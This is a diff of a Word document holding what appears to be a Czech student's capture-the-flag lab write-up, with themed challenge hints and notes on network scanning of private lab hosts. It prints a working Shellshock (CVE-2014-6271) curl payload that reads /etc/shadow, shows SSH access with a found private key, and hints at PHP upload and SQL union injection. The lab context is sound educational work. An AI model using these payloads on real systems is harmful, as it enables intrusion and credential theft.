+        <w:t xml:space="preserve">The secret A is hidden deep down in the shadow of the Iron Fortress. Although the gate used to be hard as a shell, nowadays it looks like it could easily crumble from a shock. A marking at the base of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>gate shows the number: 2014-6271. It seems like the housekeeper of the Iron Fortress forgot to upgrade the defences of his house.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Jedná se o tajemství na serveru </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>10.89.1.15</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Pomocí příkazu curl jsem si stáhl obsah http stránku.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Z ní je možné vyčíst, že obsahuje odkaz na </w:t>
+      </w:r>
+      <w:r>
+        <w:t>/cgi-bin/gate</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. S kombinací s tipem  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>2014-6271</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">lze odvodit, že jde o zranitelnost </w:t>
+      </w:r>
+      <w:r>
+        <w:t>shell shock (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>CVE-2014-6271</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pomocí </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> jsem otestoval, že je skutečně možné využít shell shock.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Vyzkoušel jsem příkazy jako </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>ls</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>cat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, ty ale nebyli úspěšné. Místo cat jsem zkusil:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>while read line; do echo \$line; done &lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> „cesta k souboru/soubor“,  který už fungoval. Zkoušel jsem ho na citlivé soubory a eventuálně jsem narazil na </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/etc/shadow, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">kde bylo </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tajemství A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Příkaz na získání tajemství</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>curl http://10.89.1.157/cgi-bin/gate -H "User-Agent: () { :; }; echo Content-Type: text/plain; echo; while read line; do echo \$line; done &lt; /etc/shadow"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>King of Edoras holds secret B hidden to everyone.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>He keeps the secret in his private space where only him can access it.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Not even his very close elven friend - admin, who shares many secrets with the king - cannot access it. However, while the king keeps an eye on his secret, he may overlook access restrictions to some other important files. Find out how to control his friend - admin - and search some other interesting files to find out, how to bypass the king's guards. Perhaps, you should start gathering other information about his friend somewhere else.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Secret C is easily retrieved from lousy workers at the elven kingdom. They barely check the outside of the incoming packages, let alone the insides. All they do is check the outsides and look on the lable, which describes the insides. Snuck a fake, possibly malicious package - a php script-like payload - through the input checkers and the secret is yours.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+        <w:ind w:left="1418" w:hanging="851"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The dark forest is a place of many webs and bugs, some of them hardly visible. Those who can not find their way should verify themselves to the forest and the way shall be pointed to them. Once you arrive to the right place, perhaps ask not only about items, but about the contents of the previous verification too. Some </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>say</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the best way to approach this task is through union.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Jedná se o tajemství na serveru </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>10.89.1.159</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Pomocí příkazu curl jsem si stáhl obsah http stránky.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Je možné se odkázat na </w:t>
+      </w:r>
+      <w:r>
+        <w:t>authentication.html</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, který obsahuje formu s jménem a heslem, a upload</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.html</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, který má formu pro uložení souboru. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>On thing is for sure - you are always welcome here in the house of Elrond. Your old friend said, that he has an interesting artefact. A chest with a damaged lid - to a common bystander, this chest looks like a junk. But Elrond is very persistent - he knows that the chest hides something.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:t> domácí složce uživatele jsem našel .ssh, v které jsem následně našel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> priv</w:t>
+      </w:r>
+      <w:r>
+        <w:t>átní ssh</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">klíč a configuraci </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pro ssh připojení uživatele elrond využívající tento klíč. Chybělo ale nastavení HostName. Jelikož v době mého řešení už nebyli dostupné hostname jednotlivých serverů, zkusil jsem se připojit na servery podporující ssh.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Příkazem</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>ssh -i ~/.ssh/id_rsa elrond@10.89.1.156</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>jsem se</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> připojil k</w:t>
+      </w:r>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>servru</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Zkusil jsem pomocí příkazu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>hostname</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> zjistit jméno serveru, ale výsledek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>a873d388b394</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> nebyl moc nápomocný</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Věci,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> co jsem udělal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Přidání uživatele user do root skupiny</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Užitečné věci</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">curl -I http://10.89.1.157 </w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -978,9 +1505,9 @@
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E6378BD"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="18FCCB1E"/>
+    <w:tmpl w:val="8974A204"/>
     <w:lvl w:ilvl="0">
-      <w:start w:val="1"/>
+      <w:start w:val="2"/>
       <w:numFmt w:val="upperRoman"/>
       <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="right"/>
@@ -1290,7 +1817,7 @@
   <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="393E3AE3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="88221DA2"/>
+    <w:tmpl w:val="A1CEE082"/>
     <w:lvl w:ilvl="0" w:tplc="08090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -1533,33 +2060,6 @@
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1555579793">
     <w:abstractNumId w:val="2"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="30689541">
     <w:abstractNumId w:val="1"/>
@@ -1967,7 +2467,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normln">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="005742A6"/>
+    <w:rsid w:val="00776D4A"/>
     <w:rPr>
       <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
       <w:lang w:val="cs-CZ"/>
@@ -2176,7 +2676,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Standardnpsmoodstavce">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
@@ -2520,6 +3019,29 @@
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
       <w:lang w:val="cs-CZ"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hypertextovodkaz">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D51115"/>
+    <w:rPr>
+      <w:color w:val="467886" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Nevyeenzmnka">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D51115"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/doc.docx
+++ b/doc.docx
@@ -50,7 +50,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5" cstate="print">
+                    <a:blip r:embed="rId7" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -218,19 +218,10 @@
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
         </w:rPr>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Užitím příkaz</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">u </w:t>
+        <w:t xml:space="preserve">ssh. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Užitím příkazu </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -251,13 +242,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>eth0</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>10.89.1.212/24</w:t>
+        <w:t>eth0 10.89.1.212/24</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -269,10 +254,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">eth1 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>10.89.47.2/24</w:t>
+        <w:t>eth1 10.89.47.2/24</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -286,7 +268,16 @@
         <w:t>Kvůli technické chybě nelze vypsat názvy zařízení</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> sítích</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">v </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sít</w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
       </w:r>
       <w:r>
         <w:t>. Sítě mají následující složení:</w:t>
@@ -297,16 +288,14 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Port 22/tcp: ssh (Open)</w:t>
+        </w:rPr>
+        <w:t>Port 22 ssh (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -316,14 +305,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="3"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>10.89.1.156</w:t>
       </w:r>
     </w:p>
@@ -334,15 +317,15 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="3"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.168</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>10.89.1.212 (de0bce1672d1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> moje připojovací stanice</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -352,186 +335,18 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="3"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.177</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.182</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.184</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.187</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.195</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.208</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.210</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.211</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.212 (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>de0bce1672d1</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> moje připojovací stanice</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Odstavecseseznamem"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.213</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>A další SSH</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> stanice</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (pravděpodobně </w:t>
+      </w:r>
+      <w:r>
+        <w:t>stroje jiných studentů)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -539,16 +354,14 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Port 80/tcp: http (Open)</w:t>
+        </w:rPr>
+        <w:t>Port 80 http (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -558,42 +371,12 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>10.89.1.157</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>The Iron Fortress</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> název z .html nástrojem curl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (The Iron Fortress – název z .html nástrojem curl)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -603,48 +386,12 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>10.89.1.159</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Mirkwood</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> název z .html nástrojem curl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (Mirkwood – název z .html nástrojem curl)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -652,16 +399,14 @@
         <w:rPr>
           <w:b/>
